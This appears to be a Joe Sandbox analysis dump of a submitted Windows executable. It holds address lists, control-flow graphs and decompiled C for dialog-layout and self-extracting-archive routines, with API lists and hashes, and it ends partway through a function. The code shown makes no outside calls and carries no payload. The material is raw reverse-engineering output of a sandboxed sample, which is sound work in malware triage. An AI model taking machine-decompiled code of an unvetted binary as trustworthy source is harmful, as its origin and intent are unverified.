                                                        0x00a1c9b2
                                                        0x00a1c9b4
                                                        0x00a1c9bb
                                                        0x00a1c9c3
                                                        0x00a1c9c8
                                                        0x00a1c9ce
                                                        0x00a1c9cf
                                                        0x00a1c9d2
                                                        0x00a1ca07
                                                        0x00a1ca0c
                                                        0x00a1ca12
                                                        0x00a1ca13
                                                        0x00a1ca18
                                                        0x00a1c9d4
                                                        0x00a1c9d4
                                                        0x00a1c9d7
                                                        0x00a1c9dd
                                                        0x00a1c9f3
                                                        0x00a1c9f8
                                                        0x00a1c9f9
                                                        0x00a1c9fe
                                                        0x00a1c9df
                                                        0x00a1c9df
                                                        0x00a1c9e4
                                                        0x00a1c9e5
                                                        0x00a1c9ea
                                                        0x00a1c9ea
                                                        0x00a1c9dd
                                                        0x00a1ca1f
                                                        0x00a1ca21
                                                        0x00a1ca28
                                                        0x00a1ca37
                                                        0x00a1ca3e
                                                        0x00a1ca43
                                                        0x00a1ca45
                                                        0x00a1ca46
                                                        0x00a1ca4d
                                                        0x00a1caa5
                                                        0x00a1caaa
                                                        0x00a1caac
                                                        0x00a1cb6f
                                                        0x00a1cb6f
                                                        0x00000000
                                                        0x00a1cb6f
                                                        0x00a1cab2
                                                        0x00a1cab4
                                                        0x00a1caba
                                                        0x00a1cac1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1cac7
                                                        0x00a1cac9
                                                        0x00a1caca
                                                        0x00a1caca
                                                        0x00a1cacd
                                                        0x00a1cad0
                                                        0x00a1cada
                                                        0x00a1cada
                                                        0x00a1cadc
                                                        0x00a1cade
                                                        0x00a1cae8
                                                        0x00a1caed
                                                        0x00a1caef
                                                        0x00a1cb4b
                                                        0x00a1cb4b
                                                        0x00a1cb4e
                                                        0x00a1cb4e
                                                        0x00a1cb50
                                                        0x00a1cb51
                                                        0x00a1cb51
                                                        0x00000000
                                                        0x00a1cb51
                                                        0x00a1caf8
                                                        0x00a1cafe
                                                        0x00a1cb03
                                                        0x00a1cb05
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1cb07
                                                        0x00a1cb09
                                                        0x00a1cb0a
                                                        0x00a1cb0c
                                                        0x00a1cb0f
                                                        0x00a1cb29
                                                        0x00a1cb2b
                                                        0x00a1cb2c
                                                        0x00a1cb2c
                                                        0x00a1cb2f
                                                        0x00a1cb2f
                                                        0x00a1cb34
                                                        0x00a1cb39
                                                        0x00a1cb3a
                                                        0x00a1cb40
                                                        0x00a1cb40
                                                        0x00a1cb41
                                                        0x00a1cb46
                                                        0x00000000
                                                        0x00a1cb46
                                                        0x00a1cb11
                                                        0x00a1cb18
                                                        0x00a1cb1b
                                                        0x00a1cb20
                                                        0x00a1cb21
                                                        0x00000000
                                                        0x00a1cb21
                                                        0x00a1cad2
                                                        0x00a1cad4
                                                        0x00a1cad5
                                                        0x00a1cad8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1cb53
                                                        0x00a1cb53
                                                        0x00a1cb56
                                                        0x00a1cb56
                                                        0x00a1cb5f
                                                        0x00a1cb64
                                                        0x00a1cb66
                                                        0x00a1cb68
                                                        0x00a1cb6a
                                                        0x00a1cb6a
                                                        0x00000000
                                                        0x00a1ca4f
                                                        0x00a1ca4f
                                                        0x00a1ca5c
                                                        0x00a1ca68
                                                        0x00a1ca6e
                                                        0x00a1ca6f
                                                        0x00a1ca70
                                                        0x00a1ca75
                                                        0x00a1ca76
                                                        0x00a1ca77
                                                        0x00a1ca79
                                                        0x00a1ca7f
                                                        0x00a1ca81
                                                        0x00a1ca94
                                                        0x00a1ca94
                                                        0x00a1cb74
                                                        0x00a1cb74
                                                        0x00a1cb7c
                                                        0x00a1cb86
                                                        0x00a1cb8d
                                                        0x00a1cb8d
                                                        0x00a1cb9a
                                                        0x00a1cba1
                                                        0x00a1cba6
                                                        0x00a1cbae
                                                        0x00a1cbba
                                                        0x00a1cbba
                                                        0x00a1cbc7
                                                        0x00a1cbcc
                                                        0x00a1cbd4
                                                        0x00a1cbde
                                                        0x00a1cbeb
                                                        0x00a1cbf2
                                                        0x00a1cbf2
                                                        0x00a1cbff
                                                        0x00a1cc06
                                                        0x00a1cc0b
                                                        0x00a1cc13
                                                        0x00a1cc19
                                                        0x00a1cc1b
                                                        0x00a1cc1b
                                                        0x00a1cc30
                                                        0x00a1cc35
                                                        0x00a1cc41
                                                        0x00a1cc43
                                                        0x00a1cc54
                                                        0x00a1cc61
                                                        0x00000000
                                                        0x00a1cc45
                                                        0x00a1cc50
                                                        0x00a1cc52
                                                        0x00a1cc66
                                                        0x00a1cc66
                                                        0x00a1cc72
                                                        0x00a1cc7f
                                                        0x00a1cc8b
                                                        0x00a1cc92
                                                        0x00a1cc97
                                                        0x00a1cc9e
                                                        0x00a1cca4
                                                        0x00a1cca6
                                                        0x00a1ccac
                                                        0x00a1ccb2
                                                        0x00a1ccb4
                                                        0x00a1ccbd
                                                        0x00a1ccc0
                                                        0x00a1ccc2
                                                        0x00a1cccb
                                                        0x00a1ccce
                                                        0x00a1ccd4
                                                        0x00a1ccd7
                                                        0x00a1cce0
                                                        0x00a1ccef
                                                        0x00a1ccf4
                                                        0x00a1ccfb
                                                        0x00a1ccfd
                                                        0x00a1ccfe
                                                        0x00a1cd04
                                                        0x00a1cd05
                                                        0x00a1cd07
                                                        0x00a1cd0c
                                                        0x00a1cd0c
                                                        0x00000000
                                                        0x00a1ccfb
                                                        0x00000000
                                                        0x00a1cc52
                                                        0x00a1cc43
                                                        0x00000000
                                                        0x00a1cd14
                                                        0x00a1cd17
                                                        0x00a1cd19
                                                        0x00a1cd19
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c65d
                                                        0x00a1c665
                                                        0x00a1c66b
                                                        0x00a1c66e
                                                        0x00a1c692
                                                        0x00a1c670
                                                        0x00a1c670
                                                        0x00a1c673
                                                        0x00a1c686
                                                        0x00a1c675
                                                        0x00a1c675
                                                        0x00a1c677
                                                        0x00a1c67c
                                                        0x00a1c67c
                                                        0x00a1c673
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c799
                                                        0x00a1c79a
                                                        0x00a1c79f
                                                        0x00a1c79f
                                                        0x00a1c79f
                                                        0x00a1c7a2
                                                        0x00a1c7a7
                                                        0x00a1c7ad
                                                        0x00a1c7ad
                                                        0x00a1c7b3
                                                        0x00a1c7b9
                                                        0x00a1c7b9
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1c0e8
                                                        0x00a1c0e8
                                                        0x00a1c0ed
                                                        0x00a1c0ee
                                                        0x00a1c0ef
                                                        0x00a1c0f4
                                                        0x00a1c0fa
                                                        0x00a1c0fd
                                                        0x00000000
                                                        0x00a1c0ff
                                                        0x00a1c0ff
                                                        0x00000000
                                                        0x00a1c0ff
                                                        0x00a1cd20
                                                        0x00a1cd20
                                                        0x00a1cd25
                                                        0x00a1cd29
                                                        0x00a1cd2d
                                                        0x00a1cd34
                                                        0x00a1cd3b
                                                        0x00a1cd3e
                                                        0x00a1cd43
                                                        0x00a1cd46
                                                        0x00a1cd49
                                                        0x00a1cd53

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A1C08A
                                                          • Part of subcall function 00A1ACC6: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00A1AD8E
                                                        • SetWindowTextW.USER32(?,?), ref: 00A1C3B7
                                                        • _wcsrchr.LIBVCRUNTIME ref: 00A1C541
                                                        • GetDlgItem.USER32(?,00000066), ref: 00A1C57C
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00A1C58C
                                                        • SendMessageW.USER32(00000000,00000143,00000000,00A4A472), ref: 00A1C59A
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A1C5C5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                        • API String ID: 3564274579-312220925
                                                        • Opcode ID: 68be7aab0e74a6e6dac475222d7fdaa964d17dc3172b64b2948b2a066734f675
                                                        • Instruction ID: 17d49b266e5945397dcc4075cf0fb031ed2342c9e492b4aaa66765a35be278f3
                                                        • Opcode Fuzzy Hash: 68be7aab0e74a6e6dac475222d7fdaa964d17dc3172b64b2948b2a066734f675
                                                        • Instruction Fuzzy Hash: A6E19176D44228AADF25EBE4ED45EEF777CAF15321F0001A6F505E7090EA749EC48B60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0DD73 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 561 a0dd73-a0ddd3 call a03f8f call a118ae call a23900 568 a0de30-a0de94 call a0d3ae GetWindowRect GetClientRect 561->568 569 a0ddd5 561->569 575 a0df37-a0df3f 568->575 576 a0de9a-a0dea2 568->576 571 a0ddda-a0dddd 569->571 573 a0de24-a0de2e 571->573 574 a0dddf-a0ddf2 call a261b0 571->574 573->568 573->571 582 a0de20 574->582 583 a0ddf4-a0de0d call a0d588 574->583 578 a0df41-a0df65 call a0d431 575->578 579 a0df76-a0df91 GetSystemMetrics GetWindow 575->579 576->579 580 a0dea8-a0def3 576->580 578->579 595 a0df67-a0df70 SetWindowTextW 578->595 585 a0df97-a0df99 579->585 586 a0e039-a0e043 579->586 587 a0def5 580->587 588 a0def7-a0def9 580->588 582->573 583->582 598 a0de0f-a0de1a SetDlgItemTextW 583->598 591 a0e031-a0e033 585->591 587->588 592 a0defb 588->592 593 a0defd-a0df33 GetWindowLongW GetWindowRect 588->593 591->586 596 a0df9e-a0dfa4 591->596 592->593 593->575 595->579 596->586 599 a0dfaa-a0e02e GetWindowRect GetWindow 596->599 598->582 599->586 601 a0e030 599->601 601->591
                                                        C-Code - Quality: 75%
                                                        			E00A0DD73(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				struct HWND__* _t107;
				signed int _t120;
				signed int _t135;
				void* _t151;
				void* _t156;
				char _t157;
				void* _t158;
				signed int _t159;
				intOrPtr _t161;
				void* _t164;
				void* _t170;
				long _t171;
				signed int _t175;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;

				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E00A03F8F( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E00A118AE( &_v2208,  &_v2288, 0x50);
				_t96 = E00A23900( &_v2300);
				_t187 = _v8;
				_t156 = 0;
				_v2376 = _t96;
				_t210 =  *0xa3e5f4 - _t156; // 0x63
				if(_t210 <= 0) {
					L8:
					_t157 = E00A0D3AE(_t156, _t203, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t157;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t170 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t170 - _t179;
					if(_t157 == 0) {
						L15:
						_t222 = _a12;
						if(_a12 == 0 && E00A0D431(_t157, _v2368.bottom, _t222, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048); // executed
						}
						L18:
						_t206 = _t205 - GetSystemMetrics(8);
						_t107 = GetWindow(_t187, 5);
						_t188 = _t107;
						_v2368.bottom = _t188;
						if(_t157 == 0) {
							L24:
							return _t107;
						}
						_t158 = 0;
						while(_t188 != 0) {
							__eflags = _t158 - 0x200;
							if(_t158 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t188,  &_v2320);
							_t171 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t120 = (_t171 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t175 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xa62154(_t188, 0, (_t194 - (_v2352.right - _t120 % _t175 >> 1) - _v2352.bottom) * _v2368.right / _t175, _t120 / _t175, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t171 + 1) * _v2368.top / _t193, 0x204);
							_t107 = GetWindow(_t188, 2);
							_t188 = _t107;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L24;
							}
							_t158 = _t158 + 1;
							__eflags = _t158;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t159 = 0x64;
					asm("cdq");
					_t135 = _v2292 * _v2368.top;
					_t161 = _t179 * _v2368.right / _t159 + _v2352.right;
					_v2324 = _t161;
					asm("cdq");
					_t186 = _t135 % _v2352.top;
					_v2352.left = _t135 / _v2352.top + _t205;
					asm("cdq");
					asm("cdq");
					_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
					_t164 = (_t170 - _t161 - _t186 >> 1) + _v2352.bottom;
					if(_t164 < 0) {
						_t164 = 0;
					}
					if(_t201 < 0) {
						_t201 = 0;
					}
					 *0xa62154(_t187, 0, _t164, _t201, _v2324, _v2352.left,  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t187,  &_v2368);
					_t157 = _v2393;
					goto L15;
				} else {
					_t202 = 0xa3e154;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0xa346b8
							_t151 = E00A261B0( &_v2288,  *_t9, _t96);
							_t208 = _t208 + 0xc;
							if(_t151 == 0) {
								_t12 =  &(_t202[1]); // 0xa346b8
								if(E00A0D588(_t156, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048); // executed
								}
							}
							_t96 = _v2368.top;
						}
						_t156 = _t156 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t156 -  *0xa3e5f4; // 0x63
					} while (_t214 < 0);
					goto L8;
				}
			}



















































                                                        0x00a0dd8b
                                                        0x00a0dd95
                                                        0x00a0dd99
                                                        0x00a0dd9e
                                                        0x00a0ddb0
                                                        0x00a0ddba
                                                        0x00a0ddbf
                                                        0x00a0ddc6
                                                        0x00a0ddc9
                                                        0x00a0ddcd
                                                        0x00a0ddd3
                                                        0x00a0de30
                                                        0x00a0de48
                                                        0x00a0de50
                                                        0x00a0de54
                                                        0x00a0de60
                                                        0x00a0de72
                                                        0x00a0de79
                                                        0x00a0de7d
                                                        0x00a0de80
                                                        0x00a0de88
                                                        0x00a0de8e
                                                        0x00a0de94
                                                        0x00a0df37
                                                        0x00a0df37
                                                        0x00a0df3f
                                                        0x00a0df70
                                                        0x00a0df70
                                                        0x00a0df76
                                                        0x00a0df81
                                                        0x00a0df83
                                                        0x00a0df89
                                                        0x00a0df8b
                                                        0x00a0df91
                                                        0x00a0e043
                                                        0x00a0e043
                                                        0x00a0e043
                                                        0x00a0df97
                                                        0x00a0e031
                                                        0x00a0df9e
                                                        0x00a0dfa4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0dfb0
                                                        0x00a0dfba
                                                        0x00a0dfcf
                                                        0x00a0dfd4
                                                        0x00a0dfd7
                                                        0x00a0dfed
                                                        0x00a0dff5
                                                        0x00a0dff7
                                                        0x00a0dff8
                                                        0x00a0e000
                                                        0x00a0e012
                                                        0x00a0e019
                                                        0x00a0e022
                                                        0x00a0e028
                                                        0x00a0e02a
                                                        0x00a0e02e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0e030
                                                        0x00a0e030
                                                        0x00a0e030
                                                        0x00000000
                                                        0x00a0e031
                                                        0x00a0dea2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0deaf
                                                        0x00a0deb2
                                                        0x00a0debb
                                                        0x00a0dec0
                                                        0x00a0dec6
                                                        0x00a0deca
                                                        0x00a0decb
                                                        0x00a0ded1
                                                        0x00a0dedb
                                                        0x00a0dee2
                                                        0x00a0deeb
                                                        0x00a0deef
                                                        0x00a0def3
                                                        0x00a0def5
                                                        0x00a0def5
                                                        0x00a0def9
                                                        0x00a0defb
                                                        0x00a0defb
                                                        0x00a0df21
                                                        0x00a0df2d
                                                        0x00a0df33
                                                        0x00000000
                                                        0x00a0ddd5
                                                        0x00a0ddd5
                                                        0x00a0ddda
                                                        0x00a0dddd
                                                        0x00a0dde0
                                                        0x00a0dde8
                                                        0x00a0dded
                                                        0x00a0ddf2
                                                        0x00a0de03
                                                        0x00a0de0d
                                                        0x00a0de1a
                                                        0x00a0de1a
                                                        0x00a0de0d
                                                        0x00a0de20
                                                        0x00a0de20
                                                        0x00a0de24
                                                        0x00a0de25
                                                        0x00a0de28
                                                        0x00a0de28
                                                        0x00000000
                                                        0x00a0ddda

                                                        APIs
                                                        • _swprintf.LIBCMT ref: 00A0DD99
                                                          • Part of subcall function 00A03F8F: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A03FA2
                                                          • Part of subcall function 00A118AE: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00A40EE8,?,00A0D4C2,00000000,?,00000050,00A40EE8), ref: 00A118CB
                                                        • _strlen.LIBCMT ref: 00A0DDBA
                                                        • SetDlgItemTextW.USER32(?,00A3E154,?), ref: 00A0DE1A
                                                        • GetWindowRect.USER32(?,?), ref: 00A0DE54
                                                        • GetClientRect.USER32(?,?), ref: 00A0DE60
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A0DF00
                                                        • GetWindowRect.USER32(?,?), ref: 00A0DF2D
                                                        • SetWindowTextW.USER32(?,?), ref: 00A0DF70
                                                        • GetSystemMetrics.USER32(00000008), ref: 00A0DF78
                                                        • GetWindow.USER32(?,00000005), ref: 00A0DF83
                                                        • GetWindowRect.USER32(00000000,?), ref: 00A0DFB0
                                                        • GetWindow.USER32(00000000,00000002), ref: 00A0E022
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                        • String ID: $%s:$CAPTION$d
                                                        • API String ID: 2407758923-2512411981
                                                        • Opcode ID: 09b001f62617e52f3608af662396929232880c9274e45022a796c90f8768579f
                                                        • Instruction ID: e77c74a715eccf23890d22095a2caa7b353c8ce5ea23b351e0389dd8154a67eb
                                                        • Opcode Fuzzy Hash: 09b001f62617e52f3608af662396929232880c9274e45022a796c90f8768579f
                                                        • Instruction Fuzzy Hash: 5981B172108305AFD714DFA8DD84B6FBBF9EB89704F04491DFA84E7290D670E9058B52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0D601 Relevance: 21.6, APIs: 3, Strings: 9, Instructions: 555COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 602 a0d601-a0d638 call a1e554 call a1e630 call a2181a 609 a0d63a-a0d669 GetModuleFileNameW call a0be89 call a10109 602->609 610 a0d66b-a0d674 call a10131 602->610 613 a0d679-a0d69d call a097b6 call a09b50 609->613 610->613 621 a0da60-a0da66 call a097f0 613->621 622 a0d6a3-a0d6ab 613->622 627 a0da6b-a0da7b 621->627 624 a0d6c9-a0d6f8 call a25d80 * 2 622->624 625 a0d6ad-a0d6c5 call a0dcec * 2 622->625 635 a0d6fb-a0d6fe 624->635 636 a0d6c7 625->636 637 a0d704-a0d70a call a09fe0 635->637 638 a0d82c-a0d84f call a09ed0 call a238a3 635->638 636->624 642 a0d70f-a0d736 call a09d90 637->642 638->621 647 a0d855-a0d870 call a09d90 638->647 648 a0d7f5-a0d7f8 642->648 649 a0d73c-a0d744 642->649 663 a0d872-a0d877 647->663 664 a0d879-a0d88c call a238a3 647->664 650 a0d7fb-a0d81d call a09ed0 648->650 652 a0d746-a0d74e 649->652 653 a0d76f-a0d77a 649->653 650->635 666 a0d823-a0d826 650->666 652->653 658 a0d750-a0d76a call a261b0 652->658 655 a0d7a5-a0d7ad 653->655 656 a0d77c-a0d788 653->656 661 a0d7d9-a0d7dd 655->661 662 a0d7af-a0d7b7 655->662 656->655 660 a0d78a-a0d78f 656->660 674 a0d7eb-a0d7f3 658->674 675 a0d76c 658->675 660->655 667 a0d791-a0d7a3 call a25af8 660->667 661->648 669 a0d7df-a0d7e2 661->669 662->661 668 a0d7b9-a0d7d3 call a261b0 662->668 670 a0d8b1-a0d8b8 663->670 664->621 680 a0d892-a0d8ae call a11692 call a2389e 664->680 666->621 666->638 667->655 685 a0d7e7 667->685 668->621 668->661 669->649 677 a0d8ba 670->677 678 a0d8bc-a0d8e5 call a100d6 call a238a3 670->678 674->650 675->653 677->678 692 a0d8f3-a0d909 678->692 693 a0d8e7-a0d8ee call a2389e 678->693 680->670 685->674 694 a0d9f1-a0da05 call a0d13a call a2389e 692->694 695 a0d90f-a0d91d 692->695 693->621 712 a0da0a-a0da17 call a2389e 694->712 697 a0d924-a0d929 695->697 700 a0dc3c-a0dc44 697->700 701 a0d92f-a0d938 697->701 705 a0dc4a-a0dc4e 700->705 706 a0d9eb-a0d9ee 700->706 703 a0d944-a0d94b 701->703 704 a0d93a-a0d93e 701->704 708 a0db40-a0db51 call a0ff9a 703->708 709 a0d951-a0d976 703->709 704->700 704->703 710 a0dc50-a0dc56 705->710 711 a0dc9e-a0dca4 705->711 706->694 727 a0dc36-a0dc39 708->727 728 a0db57-a0db80 call a10131 call a25b75 708->728 715 a0d979-a0d99e call a23883 call a25af8 709->715 716 a0d9e2-a0d9e5 710->716 717 a0dc5c-a0dc63 710->717 713 a0dca6-a0dcac 711->713 714 a0dcca-a0dcea call a0d13a 711->714 735 a0da31-a0da5d call a25d80 * 2 712->735 736 a0da19-a0da2f call a0dcec * 2 712->736 713->714 720 a0dcae-a0dcb4 713->720 739 a0dcc2-a0dcc5 714->739 753 a0d9a0-a0d9aa 715->753 754 a0d9b6 715->754 716->697 716->706 723 a0dc65-a0dc68 717->723 724 a0dc8a 717->724 720->716 730 a0dcba-a0dcc1 720->730 733 a0dc86-a0dc88 723->733 734 a0dc6a-a0dc6d 723->734 729 a0dc8c-a0dc99 724->729 727->700 728->727 762 a0db86-a0dbfc call a118ae call a100d6 call a100af call a100d6 call a25bc9 728->762 729->716 730->739 733->729 741 a0dc82-a0dc84 734->741 742 a0dc6f-a0dc72 734->742 735->621 736->735 741->729 747 a0dc74-a0dc78 742->747 748 a0dc7e-a0dc80 742->748 747->720 755 a0dc7a-a0dc7c 747->755 748->729 753->754 759 a0d9ac-a0d9b4 753->759 760 a0d9b9-a0d9bd 754->760 755->729 759->760 760->715 761 a0d9bf-a0d9c6 760->761 763 a0d9cc-a0d9da call a100d6 761->763 764 a0da7e-a0da81 761->764 794 a0dc0a-a0dc1f 762->794 795 a0dbfe-a0dc07 762->795 769 a0d9df 763->769 764->708 768 a0da87-a0da8e 764->768 771 a0da90-a0da94 768->771 772 a0da96-a0da97 768->772 769->716 771->772 774 a0da99-a0daa7 771->774 772->768 776 a0dac8-a0daf0 call a118ae 774->776 777 a0daa9-a0daac 774->777 784 a0daf2-a0db0e call a238b9 776->784 785 a0db13-a0db1b 776->785 778 a0dac5 777->778 779 a0daae-a0dac3 777->779 778->776 779->777 779->778 784->769 788 a0db22-a0db3b call a0e046 785->788 789 a0db1d 785->789 788->769 789->788 797 a0dc20-a0dc27 794->797 795->794 798 a0dc33-a0dc34 797->798 799 a0dc29-a0dc2d 797->799 798->797 799->769 799->798
                                                        C-Code - Quality: 89%
                                                        			E00A0D601(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t200;
				void* _t201;
				WCHAR* _t202;
				void* _t207;
				signed int _t212;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t232;
				void* _t233;
				void* _t236;
				signed int _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t248;
				signed int _t252;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t277;
				void* _t278;
				signed int _t283;
				char* _t284;
				signed int _t288;
				short _t291;
				void* _t292;
				signed int _t298;
				signed int _t303;
				void* _t306;
				void* _t308;
				void* _t311;
				signed int _t320;
				intOrPtr* _t322;
				unsigned int _t332;
				signed int _t334;
				unsigned int _t337;
				signed int _t340;
				void* _t347;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				signed int _t361;
				signed int _t365;
				void* _t374;
				signed int _t376;
				signed int _t377;
				void* _t378;
				void* _t379;
				intOrPtr* _t380;
				signed int _t381;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				intOrPtr* _t391;
				signed int _t393;
				void* _t394;
				void* _t396;
				void* _t398;
				void* _t402;
				void* _t403;

				_t374 = __edx;
				_t322 = __ecx;
				E00A1E554(E00A321F7, _t394);
				E00A1E630();
				_t200 = 0x5c;
				_push(0x42f8);
				_push( *((intOrPtr*)(_t394 + 8)));
				_t391 = _t322;
				 *((intOrPtr*)(_t394 - 0x40)) = _t200;
				 *((intOrPtr*)(_t394 - 0x3c)) = _t391;
				_t201 = E00A2181A(_t322);
				_t320 = 0;
				_t400 = _t201;
				_t202 = _t394 - 0x12dc;
				if(_t201 != 0) {
					E00A10131(_t202,  *((intOrPtr*)(_t394 + 8)), 0x800);
				} else {
					GetModuleFileNameW(0, _t202, 0x800);
					 *((short*)(E00A0BE89(_t400, _t394 - 0x12dc))) = 0;
					E00A10109(_t400, _t394 - 0x12dc,  *((intOrPtr*)(_t394 + 8)), 0x800);
				}
				E00A097B6(_t394 - 0x2304);
				_push(4);
				 *(_t394 - 4) = _t320;
				_push(_t394 - 0x12dc);
				if(E00A09B50(_t394 - 0x2304, _t391) == 0) {
					L57:
					_t207 = E00A097F0(_t394 - 0x2304, _t391); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t394 - 0xc));
					return _t207;
				} else {
					_t384 = _t320;
					_t402 =  *0xa3e5f4 - _t384; // 0x63
					if(_t402 <= 0) {
						L7:
						E00A25D80(_t320, _t384, _t391,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E00A0D270);
						E00A25D80(_t320, _t384, _t391,  *((intOrPtr*)(_t391 + 0x14)),  *((intOrPtr*)(_t391 + 0x18)), 4, E00A0D1D0);
						_t398 = _t396 + 0x20;
						 *(_t394 - 0x15) = _t320;
						_t385 = _t384 | 0xffffffff;
						 *(_t394 - 0x2c) = _t320;
						 *(_t394 - 0x20) = _t385;
						while(_t385 == 0xffffffff) {
							 *(_t394 - 0x10) = E00A09FE0();
							_t298 = E00A09D90(_t394 - 0x2304, _t374, _t394 - 0x4304, 0x2000);
							 *(_t394 - 0x28) = _t298;
							_t388 = _t320;
							_t25 = _t298 - 0x10; // -16
							_t365 = _t25;
							 *(_t394 - 0x30) = _t365;
							if(_t365 < 0) {
								L25:
								_t299 =  *(_t394 - 0x10);
								_t385 =  *(_t394 - 0x20);
								L26:
								E00A09ED0(_t394 - 0x2304, _t394, _t299 +  *(_t394 - 0x28) + 0xfffffff0, _t320, _t320);
								_t303 =  *(_t394 - 0x2c) + 1;
								 *(_t394 - 0x2c) = _t303;
